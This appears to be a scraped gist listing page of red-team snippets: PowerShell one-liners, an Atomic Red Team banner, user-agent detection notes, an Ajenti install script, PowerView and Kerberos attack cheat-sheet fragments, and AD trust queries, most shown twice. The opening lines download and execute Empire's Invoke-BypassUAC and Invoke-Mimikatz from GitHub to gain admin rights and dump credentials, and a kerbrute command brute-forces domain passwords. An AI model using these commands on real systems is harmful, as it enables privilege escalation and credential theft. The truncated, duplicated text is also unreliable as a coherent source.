Sheeraz Ali pwnmeow

## RedTeam_CheatSheet.ps1
# Description:
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

## AtomicTestsCommandLines.txt

     _  _____ ___  __  __ ___ ____   ____  _____ ____    _____ _____    _    __  __
    / \|_   _/ _ \|  \/  |_ _/ ___| |  _ \| ____|  _ \  |_   _| ____|  / \  |  \/  |
   / _ \ | || | | | |\/| || | |     | |_) |  _| | | | |   | | |  _|   / _ \ | |\/| |
  / ___ \| || |_| | |  | || | |___  |  _ <| |___| |_| |   | | | |___ / ___ \| |  | |
 /_/   \_\_| \___/|_|  |_|___\____| |_| \_\_____|____/    |_| |_____/_/   \_\_|  |_|


[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s)

## Native-Windows-Useragents-malicious.txt
//Invoke-WebRequest in Powershell - manually whitelist legit content first:
Mozilla/*WindowsPowerShell/*

System.Net.WebClient.DownloadFile():
None

//Start-BitsTransfer - manually whitelist legit content first:
Microsoft BITS/*

//certutil.exe - manually whitelist legit content first:

## ajenti-v-php7.3.sh
#Insall Ajenti ubuntu 18.04
apt-get update
wget http://repo.ajenti.org/debian/key -O- | apt-key add -
echo "deb http://repo.ajenti.org/ng/debian main main ubuntu" >> /etc/apt/sources.list
apt-get update
# install python imaging
apt upgrade
apt-get install python-pillow
cd ~
wget http://security.ubuntu.com/ubuntu/pool/universe/p/pillow/python-imaging_4.1.1-3build2_all.deb

## PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                pwnmeow
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              June 16, 2021 12:28
                — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## iptables-redsocks.sh
#!/bin/bash
# Create new chain
sudo iptables -t nat -N REDSOCKS

# Ignore LANs and some other reserved addresses.
sudo iptables -t nat -A REDSOCKS -d 0.0.0.0/8 -j RETURN
sudo iptables -t nat -A REDSOCKS -d 10.0.0.0/8 -j RETURN
sudo iptables -t nat -A REDSOCKS -d 127.0.0.0/8 -j RETURN
sudo iptables -t nat -A REDSOCKS -d 169.254.0.0/16 -j RETURN
sudo iptables -t nat -A REDSOCKS -d 172.16.0.0/12 -j RETURN

## 1) Active Directory One Liners
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts

([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()


Grab Forest Trusts.

([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
	# Description:
	# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

	# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

	# Invoke-Mimikatz: Dump credentials from memory
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

	# Import Mimikatz Module to run further commands

	_ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __
	/ \\|_ _/ _ \\| \/ \|_ _/ ___\| \| _ \\| ____\| _ \ \|_ _\| ____\| / \ \| \/ \|
	/ _ \ \| \|\| \| \| \| \|\/\| \|\| \| \| \| \|_) \| _\| \| \| \| \| \| \| \| _\| / _ \ \| \|\/\| \|
	/ ___ \\| \|\| \|_\| \| \| \| \|\| \| \|___ \| _ <\| \|___\| \|_\| \| \| \| \| \|___ / ___ \\| \| \| \|
	/_/ \_\_\| \___/\|_\| \|_\|___\____\| \|_\| \_\_____\|____/ \|_\| \|_____/_/ \_\_\| \|_\|



	[******BEGIN TEST*****] Data Compressed T1002 has 3 Test(s)
	//Invoke-WebRequest in Powershell - manually whitelist legit content first:
	Mozilla/WindowsPowerShell/

	System.Net.WebClient.DownloadFile():
	None

	//Start-BitsTransfer - manually whitelist legit content first:
	Microsoft BITS/*

	//certutil.exe - manually whitelist legit content first:
	#Insall Ajenti ubuntu 18.04
	apt-get update
	wget http://repo.ajenti.org/debian/key -O- \| apt-key add -
	echo "deb http://repo.ajenti.org/ng/debian main main ubuntu" >> /etc/apt/sources.list
	apt-get update
	# install python imaging
	apt upgrade
	apt-get install python-pillow
	cd ~
	wget http://security.ubuntu.com/ubuntu/pool/universe/p/pillow/python-imaging_4.1.1-3build2_all.deb
	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set
	#!/bin/bash
	# Create new chain
	sudo iptables -t nat -N REDSOCKS

	# Ignore LANs and some other reserved addresses.
	sudo iptables -t nat -A REDSOCKS -d 0.0.0.0/8 -j RETURN
	sudo iptables -t nat -A REDSOCKS -d 10.0.0.0/8 -j RETURN
	sudo iptables -t nat -A REDSOCKS -d 127.0.0.0/8 -j RETURN
	sudo iptables -t nat -A REDSOCKS -d 169.254.0.0/16 -j RETURN
	sudo iptables -t nat -A REDSOCKS -d 172.16.0.0/12 -j RETURN
	Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts

	([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()


	Grab Forest Trusts.

	([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()